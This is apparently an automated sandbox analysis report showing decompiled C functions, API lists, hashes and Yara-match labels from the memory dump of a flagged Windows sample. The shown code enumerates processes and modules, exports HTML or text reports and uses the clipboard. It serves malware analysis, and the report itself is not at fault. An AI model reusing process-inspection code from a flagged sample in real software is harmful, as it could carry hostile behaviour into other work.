                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                                                                                                  • String ID: caption$dialog_%d
                                                                                                                                                                  • API String ID: 246480800-4161923789
                                                                                                                                                                  • Opcode ID: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                                                                                                                                                                  • Instruction ID: c346797357670b32f643cbd36cfbc212eb539bb93902627947de0ac2d0f12ab5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                                                                                                                                                                  • Instruction Fuzzy Hash: DBF0BB3058424D7EDB129750DD06FD97A68AB18746F0400EAFB44E10D1DBF8AAD0875E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E8C6, Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                                                  			E0040E8C6(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E00412360(0x446c, __ecx);
				_t102 = 0;
				_v20 = 0;
				if(E004062A6() == 0 ||  *0x418518 == 0) {
					if( *0x418514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x417fe0(8, _t94);
						_v8 = _t63;
						if(_t63 != 0xffffffff) {
							_v20 = 1;
							_v1132 = 0x224;
							_t64 =  *0x417fd8(_t63,  &_v1132);
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);
								_v312 = _v1104;
								_v316 = _t94;
								strcpy( &_v308,  &_v844);
								_v44 = _v1108;
								_t107 = _t107 + 0x14;
								_v40 = _v1112;
								_v1132 = 0x224;
								if(E0040EAD0(_a8,  &_v316) != 0) {
									_t64 =  *0x417fd4(_v8,  &_v1132);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);
						_push(0x4000);
						_push( &_v17516);
						_push(_t77);
						if( *0x417fe4() != 0) {
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x417fdc(_v8, _t84,  &_v580, 0x104);
									E0040E7E3( &_v308,  &_v580);
									_push(0xc);
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x417fe8() != 0) {
										_v44 = _v28;
										_v40 = _v32;
									}
									if(E0040EAD0(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);
					}
				}
				return _v20;
			}
































                                                                                                                                                                  0x0040e8ce
                                                                                                                                                                  0x0040e8d6
                                                                                                                                                                  0x0040e8d8
                                                                                                                                                                  0x0040e8e2
                                                                                                                                                                  0x0040ea06
                                                                                                                                                                  0x0040ea0c
                                                                                                                                                                  0x0040ea12
                                                                                                                                                                  0x0040ea1b
                                                                                                                                                                  0x0040ea1e
                                                                                                                                                                  0x0040ea31
                                                                                                                                                                  0x0040ea38
                                                                                                                                                                  0x0040ea3e
                                                                                                                                                                  0x0040eabb
                                                                                                                                                                  0x0040ea53
                                                                                                                                                                  0x0040ea5e
                                                                                                                                                                  0x0040ea72
                                                                                                                                                                  0x0040ea78
                                                                                                                                                                  0x0040ea83
                                                                                                                                                                  0x0040ea8c
                                                                                                                                                                  0x0040ea8f
                                                                                                                                                                  0x0040ea9c
                                                                                                                                                                  0x0040eaa9
                                                                                                                                                                  0x0040eab5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040eab5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040eaa9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040eabb
                                                                                                                                                                  0x0040ea1e
                                                                                                                                                                  0x0040e8f4
                                                                                                                                                                  0x0040e8fd
                                                                                                                                                                  0x0040e905
                                                                                                                                                                  0x0040e908
                                                                                                                                                                  0x0040e911
                                                                                                                                                                  0x0040e912
                                                                                                                                                                  0x0040e91d
                                                                                                                                                                  0x0040e91e
                                                                                                                                                                  0x0040e927
                                                                                                                                                                  0x0040e92d
                                                                                                                                                                  0x0040e92d
                                                                                                                                                                  0x0040e931
                                                                                                                                                                  0x0040e938
                                                                                                                                                                  0x0040e93b
                                                                                                                                                                  0x0040e94a
                                                                                                                                                                  0x0040e953
                                                                                                                                                                  0x0040e95a
                                                                                                                                                                  0x0040e96c
                                                                                                                                                                  0x0040e977
                                                                                                                                                                  0x0040e97e
                                                                                                                                                                  0x0040e982
                                                                                                                                                                  0x0040e993
                                                                                                                                                                  0x0040e999
                                                                                                                                                                  0x0040e9ab
                                                                                                                                                                  0x0040e9b0
                                                                                                                                                                  0x0040e9b5
                                                                                                                                                                  0x0040e9b6
                                                                                                                                                                  0x0040e9bc
                                                                                                                                                                  0x0040e9c7
                                                                                                                                                                  0x0040e9cc
                                                                                                                                                                  0x0040e9d2
                                                                                                                                                                  0x0040e9d2
                                                                                                                                                                  0x0040e9e6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e9ec
                                                                                                                                                                  0x0040e9f5
                                                                                                                                                                  0x0040e948
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e9fb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e9f5
                                                                                                                                                                  0x0040e94a
                                                                                                                                                                  0x0040e93b
                                                                                                                                                                  0x0040eabf
                                                                                                                                                                  0x0040eac2
                                                                                                                                                                  0x0040eac2
                                                                                                                                                                  0x0040e908
                                                                                                                                                                  0x0040eacf

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040E3BD,00000000,00000000), ref: 0040E8FD
                                                                                                                                                                  • memset.MSVCRT ref: 0040E95A
                                                                                                                                                                  • memset.MSVCRT ref: 0040E96C
                                                                                                                                                                    • Part of subcall function 0040E7E3: strcpy.MSVCRT(?,-00000001), ref: 0040E809
                                                                                                                                                                  • memset.MSVCRT ref: 0040EA53
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040EA78
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,0040E3BD,?), ref: 0040EAC2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3799309942-0
                                                                                                                                                                  • Opcode ID: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                                                                                                                                                                  • Instruction ID: 2a82ac7989168376751b009825c1859dcdea9a7a89aff0dc4cc4404167d83f81
                                                                                                                                                                  • Opcode Fuzzy Hash: d6c67b7d57a34b5381901d3c53457be756757403445260d001e2bbe54def35e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 79512EB1A00218AFDB10DF95CD85ADEBBB8FB48304F1445AAF505A2281DB749F90CF69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004094DC, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 61%
                                                                                                                                                                  			E004094DC(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				void* __edi;
				signed int _t51;
				char* _t53;
				char* _t63;
				intOrPtr* _t69;
				signed int _t70;
				char _t84;
				intOrPtr* _t91;
				signed int _t95;
				void* _t96;
				void* _t97;

				_t69 = __ebx;
				_t70 = 6;
				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
				_t97 = _t96 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00405F07(_a4, "<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t91 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
						E0040F6E2(_v28,  &_v68);
						E0040F70E( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
						_t63 =  *(_t69 + 0x50);
						_t84 =  *_t63;
						if(_t84 == 0 || _t84 == 0x20) {
							strcat(_t63, "&nbsp;");
						}
						E0040F797( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
						E00405F07(_a4,  *(_t69 + 0x4c));
						_t97 = _t97 + 0x20;
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
				}
				return E00405F07(_a4, 0x413b1c);
			}























                                                                                                                                                                  0x004094dc
                                                                                                                                                                  0x004094e6
                                                                                                                                                                  0x004094ef
                                                                                                                                                                  0x004094ef
                                                                                                                                                                  0x004094f1
                                                                                                                                                                  0x004094fb
                                                                                                                                                                  0x004094fc
                                                                                                                                                                  0x004094fd
                                                                                                                                                                  0x004094fe
                                                                                                                                                                  0x004094ff
                                                                                                                                                                  0x00409509
                                                                                                                                                                  0x0040950a
                                                                                                                                                                  0x0040950f
                                                                                                                                                                  0x00409516
                                                                                                                                                                  0x0040951c
                                                                                                                                                                  0x0040951f
                                                                                                                                                                  0x00409525
                                                                                                                                                                  0x00409530
                                                                                                                                                                  0x00409533
                                                                                                                                                                  0x00409535
                                                                                                                                                                  0x00409535
                                                                                                                                                                  0x00409538
                                                                                                                                                                  0x0040953b
                                                                                                                                                                  0x0040953f
                                                                                                                                                                  0x00409543
                                                                                                                                                                  0x00409547
                                                                                                                                                                  0x00409551
                                                                                                                                                                  0x0040955a
                                                                                                                                                                  0x00409564
                                                                                                                                                                  0x0040957a
                                                                                                                                                                  0x0040958a
                                                                                                                                                                  0x0040958d
                                                                                                                                                                  0x00409590
                                                                                                                                                                  0x00409594
                                                                                                                                                                  0x004095a1
                                                                                                                                                                  0x004095a7
                                                                                                                                                                  0x004095b1
                                                                                                                                                                  0x004095c3
                                                                                                                                                                  0x004095ce
                                                                                                                                                                  0x004095d3
                                                                                                                                                                  0x004095d6
                                                                                                                                                                  0x004095d7
                                                                                                                                                                  0x0040951c
                                                                                                                                                                  0x004095f2

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
                                                                                                                                                                  • strcat.MSVCRT(?,&nbsp;), ref: 004095A1
                                                                                                                                                                  • sprintf.MSVCRT ref: 004095C3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWritesprintfstrcatstrlen
                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                  • API String ID: 3813295786-4153097237
                                                                                                                                                                  • Opcode ID: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                                                                                                                                                                  • Instruction ID: d2e4fb28aa3b1966a3fc448ecfbbe776d9831430555dea6067297da34f065eca
                                                                                                                                                                  • Opcode Fuzzy Hash: 08929488c0db453afa1456f90ad20cd14aeeb908293d423d0ab32d1dc2333b83
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F318F32900209AFDF15DF95C8869DE7BB5FF44314F1041AAFD10AB1E2D776A951CB84
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411133, Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E00411133(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E00412360(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L00412090();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E004104AE( &_v5796, _t80);
				_v5796 = 0x41553c;
				E00410B65( &_v3636);
				E00410B65( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0041061F(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E0041072A(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060DA(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
				_push(_v8);
				L00412096();
				return E00410596( &_v5796);
			}































                                                                                                                                                                  0x00411133
                                                                                                                                                                  0x0041113b
                                                                                                                                                                  0x00411146
                                                                                                                                                                  0x0041114b
                                                                                                                                                                  0x0041114b
                                                                                                                                                                  0x0041114e
                                                                                                                                                                  0x0041114f
                                                                                                                                                                  0x00411156
                                                                                                                                                                  0x00411161
                                                                                                                                                                  0x00411166
                                                                                                                                                                  0x00411168
                                                                                                                                                                  0x0041116e
                                                                                                                                                                  0x00411174
                                                                                                                                                                  0x0041117f
                                                                                                                                                                  0x00411189
                                                                                                                                                                  0x00411194
                                                                                                                                                                  0x00411199
                                                                                                                                                                  0x004111a2
                                                                                                                                                                  0x004111a8
                                                                                                                                                                  0x004111b1
                                                                                                                                                                  0x004111b4
                                                                                                                                                                  0x004111c5
                                                                                                                                                                  0x004111cf
                                                                                                                                                                  0x004111da
                                                                                                                                                                  0x004111dd
                                                                                                                                                                  0x004111e3
                                                                                                                                                                  0x004111e6
                                                                                                                                                                  0x004111f6
                                                                                                                                                                  0x004111fe
                                                                                                                                                                  0x00411212
                                                                                                                                                                  0x0041121a
                                                                                                                                                                  0x0041121e
                                                                                                                                                                  0x00411224
                                                                                                                                                                  0x00411224
                                                                                                                                                                  0x00411231
                                                                                                                                                                  0x00411231
                                                                                                                                                                  0x004111f6
                                                                                                                                                                  0x00411239
                                                                                                                                                                  0x00411246
                                                                                                                                                                  0x00411253
                                                                                                                                                                  0x00411253
                                                                                                                                                                  0x00411246
                                                                                                                                                                  0x00411255
                                                                                                                                                                  0x00411258
                                                                                                                                                                  0x0041126d

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcslen.MSVCRT ref: 00411146
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                                                                                                                                                                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104C3
                                                                                                                                                                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104E1
                                                                                                                                                                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 004104FC
                                                                                                                                                                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410525
                                                                                                                                                                    • Part of subcall function 004104AE: ??2@YAPAXI@Z.MSVCRT ref: 00410549
                                                                                                                                                                  • strlen.MSVCRT ref: 004111AB
                                                                                                                                                                    • Part of subcall function 0041061F: ??3@YAXPAX@Z.MSVCRT ref: 0041062A
                                                                                                                                                                    • Part of subcall function 0041061F: ??2@YAPAXI@Z.MSVCRT ref: 00410639
                                                                                                                                                                  • memcpy.MSVCRT ref: 004111C5
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00411258
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 577244452-0
                                                                                                                                                                  • Opcode ID: 770519e61b31c83333b02cb56a71775f59d99fca928b07c7ba0596dbe0491682
                                                                                                                                                                  • Instruction ID: 068040a7654b3252a10ead66c722fc8ae16d1693d490f738ed846916017eff7d
                                                                                                                                                                  • Opcode Fuzzy Hash: 770519e61b31c83333b02cb56a71775f59d99fca928b07c7ba0596dbe0491682
                                                                                                                                                                  • Instruction Fuzzy Hash: 21314472D04219ABCF21EF65C8809DDBBB5AF49314F0481AAE608A3251CB396FD5CF59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AC6E, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040AC6E(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				char _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t39;
				void* _t52;
				char _t59;
				char* _t60;
				intOrPtr _t61;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_t29 = E00407A69(0x1f5);
				_t59 = "*.txt";
				_v72 = _t29;
				_v68 = _t59;
				_v64 = E00407A69(0x1f6);
				_v60 = _t59;
				_v56 = E00407A69(0x1f7);
				_v52 = _t59;
				_t32 = E00407A69(0x1f8);
				_t60 = "*.htm;*.html";
				_v48 = _t32;
				_v44 = _t60;
				_v40 = E00407A69(0x1f9);
				_v36 = _t60;
				_v32 = E00407A69(0x1fa);
				_v28 = "*.xml";
				_t35 = E00407A69(0x1fb);
				_t61 = "*.csv";
				_v24 = _t35;
				_v20 = _t61;
				_v16 = E00407A69(0x1fc);
				_v12 = _t61;
				E0040687C( &_v1096,  &_v72, 8);
				_t52 = 7;
				_t39 = E00407A69(_t52);
				_t23 =  &_v8; // 0x747874
				return E004066AF(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}































                                                                                                                                                                  0x0040ac87
                                                                                                                                                                  0x0040ac8e
                                                                                                                                                                  0x0040ac9b
                                                                                                                                                                  0x0040aca2
                                                                                                                                                                  0x0040aca7
                                                                                                                                                                  0x0040acad
                                                                                                                                                                  0x0040acb0
                                                                                                                                                                  0x0040acbd
                                                                                                                                                                  0x0040acc0
                                                                                                                                                                  0x0040acc9
                                                                                                                                                                  0x0040accc
                                                                                                                                                                  0x0040accf
                                                                                                                                                                  0x0040acd4
                                                                                                                                                                  0x0040acde
                                                                                                                                                                  0x0040ace1
                                                                                                                                                                  0x0040acea
                                                                                                                                                                  0x0040aced
                                                                                                                                                                  0x0040acfa
                                                                                                                                                                  0x0040acfd
                                                                                                                                                                  0x0040ad04
                                                                                                                                                                  0x0040ad09
                                                                                                                                                                  0x0040ad0f
                                                                                                                                                                  0x0040ad12
                                                                                                                                                                  0x0040ad1a
                                                                                                                                                                  0x0040ad29
                                                                                                                                                                  0x0040ad2c
                                                                                                                                                                  0x0040ad35
                                                                                                                                                                  0x0040ad36
                                                                                                                                                                  0x0040ad3e
                                                                                                                                                                  0x0040ad5e

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040AC8E
                                                                                                                                                                    • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76D24DE0), ref: 00407AE4
                                                                                                                                                                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                    • Part of subcall function 0040687C: memset.MSVCRT ref: 0040689C
                                                                                                                                                                    • Part of subcall function 0040687C: sprintf.MSVCRT ref: 004068C9
                                                                                                                                                                    • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068D5
                                                                                                                                                                    • Part of subcall function 0040687C: memcpy.MSVCRT ref: 004068EA
                                                                                                                                                                    • Part of subcall function 0040687C: strlen.MSVCRT ref: 004068F8
                                                                                                                                                                    • Part of subcall function 0040687C: memcpy.MSVCRT ref: 00406908
                                                                                                                                                                    • Part of subcall function 004066AF: GetSaveFileNameA.COMDLG32(?), ref: 004066FE
                                                                                                                                                                    • Part of subcall function 004066AF: strcpy.MSVCRT(?,?), ref: 00406715
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                  • API String ID: 4021364944-3614832568
                                                                                                                                                                  • Opcode ID: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                                                                                                                                                                  • Instruction ID: b1b2e5a0efe066de17158a8bc8fa7ff9efe1d0f31d50f94681ee96e1b845f603
                                                                                                                                                                  • Opcode Fuzzy Hash: 1ceb36e2604b9e9553284c6e0b24bc998c578e1058e1945574a68be56ec71ef9
                                                                                                                                                                  • Instruction Fuzzy Hash: B82101B1E042199ED700EFE6D8817DEBBB4AB08704F10417FE509B7282D7382B458F5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403A67, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                  			E00403A67(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E00412360(0x6004, __ecx);
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                                                                                                                                                  0x00403a6f
                                                                                                                                                                  0x00403a85
                                                                                                                                                                  0x00403a8c
                                                                                                                                                                  0x00403a9f
                                                                                                                                                                  0x00403aa5
                                                                                                                                                                  0x00403abc
                                                                                                                                                                  0x00403adb
                                                                                                                                                                  0x00403b07

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00403A8C
                                                                                                                                                                  • memset.MSVCRT ref: 00403AA5
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403ABC
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403ADB
                                                                                                                                                                  • strlen.MSVCRT ref: 00403AED
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1786725549-0
                                                                                                                                                                  • Opcode ID: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                                                                                                                                                                  • Instruction ID: 60d5cd2968a458345304ed859c80f0f17d47a7f7ae6e16c58bf0b652b2e175c6
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                                                                                                                                                                  • Instruction Fuzzy Hash: B8116DB650012CBEFB009B94DD85DEBB7ADEF08354F0041A2B719E2091D6759F54CB78
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040ADA4, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040ADA4(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AD61(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FD0(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F4B(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                                                                                                                                                  0x0040ada4
